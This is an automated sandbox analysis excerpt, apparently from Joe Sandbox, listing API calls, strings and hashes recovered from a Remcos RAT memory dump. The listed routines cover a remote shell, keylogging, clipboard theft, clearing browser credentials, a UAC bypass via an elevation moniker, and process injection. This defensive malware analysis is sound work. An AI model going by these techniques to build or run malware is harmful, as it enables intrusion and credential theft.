                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                              • API String ID: 2918587301-599666313
                                                                              • Opcode ID: 4864535f3f04b732bd7309598b47152418b720285810e5ce1748ebde293c50ce
                                                                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                              • Opcode Fuzzy Hash: 4864535f3f04b732bd7309598b47152418b720285810e5ce1748ebde293c50ce
                                                                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                              • API String ID: 3815868655-81343324
                                                                              • Opcode ID: 04ba8fd0531e554fcf84a0a5055e6f0d52085a2b4c4a0f42a3f9ebc49000daac
                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                              • Opcode Fuzzy Hash: 04ba8fd0531e554fcf84a0a5055e6f0d52085a2b4c4a0f42a3f9ebc49000daac
                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                              • API String ID: 65172268-860466531
                                                                              • Opcode ID: 200a0184714d490d0ba0b4defa5ea6ad14bb453dc3729acd8178532fd6d1d07e
                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                              • Opcode Fuzzy Hash: 200a0184714d490d0ba0b4defa5ea6ad14bb453dc3729acd8178532fd6d1d07e
                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$CloseFile$FirstNext
                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                              • API String ID: 1164774033-3681987949
                                                                              • Opcode ID: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                              • Opcode Fuzzy Hash: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$Close$File$FirstNext
                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                              • API String ID: 3527384056-432212279
                                                                              • Opcode ID: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                              • Opcode Fuzzy Hash: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                              • API String ID: 726551946-3025026198
                                                                              • Opcode ID: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                              • Opcode Fuzzy Hash: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                              APIs
                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                              • String ID:
                                                                              • API String ID: 3520204547-0
                                                                              • Opcode ID: e20a420068aeef0f1e8fb2ee20dbe7dc4de82fb71b06899c46137a2a509998a5
                                                                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                              • Opcode Fuzzy Hash: e20a420068aeef0f1e8fb2ee20dbe7dc4de82fb71b06899c46137a2a509998a5
                                                                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                              • API String ID: 0-3177665633
                                                                              • Opcode ID: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                              • Opcode Fuzzy Hash: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                              • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                              • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                              • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                              • String ID: 8[G
                                                                              • API String ID: 1888522110-1691237782
                                                                              • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                              • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object_wcslen
                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                              • API String ID: 240030777-3166923314
                                                                              • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                              • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                              APIs
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                              • GetLastError.KERNEL32 ref: 00419935
                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                              • String ID:
                                                                              • API String ID: 3587775597-0
                                                                              • Opcode ID: 8acc4e60abbd127f50a47cce2bf7a6c9aff27ad0628ee74ba6f6268c750313f0
                                                                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                              • Opcode Fuzzy Hash: 8acc4e60abbd127f50a47cce2bf7a6c9aff27ad0628ee74ba6f6268c750313f0
                                                                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                              • String ID:
                                                                              • API String ID: 2341273852-0
                                                                              • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                              • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Find$CreateFirstNext
                                                                              • String ID: @CG$XCG$`HG$`HG$>G
                                                                              • API String ID: 341183262-3780268858
                                                                              • Opcode ID: 650a2c604283885341558d4c80f674c4545f87da0af4cf1bc821494a8c9d9062
                                                                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                              • Opcode Fuzzy Hash: 650a2c604283885341558d4c80f674c4545f87da0af4cf1bc821494a8c9d9062
                                                                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                              APIs
                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                              • API String ID: 2127411465-314212984
                                                                              • Opcode ID: 122e46eacc1daa1132902a61cb7e51bea5718349c3cff33a5b231bf10be2746f
                                                                              • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                              • Opcode Fuzzy Hash: 122e46eacc1daa1132902a61cb7e51bea5718349c3cff33a5b231bf10be2746f
                                                                              • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                              APIs
                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                              Strings
                                                                              • UserProfile, xrefs: 0040B227
                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                              • API String ID: 2018770650-1062637481
                                                                              • Opcode ID: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                              • Opcode Fuzzy Hash: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 3534403312-3733053543
                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
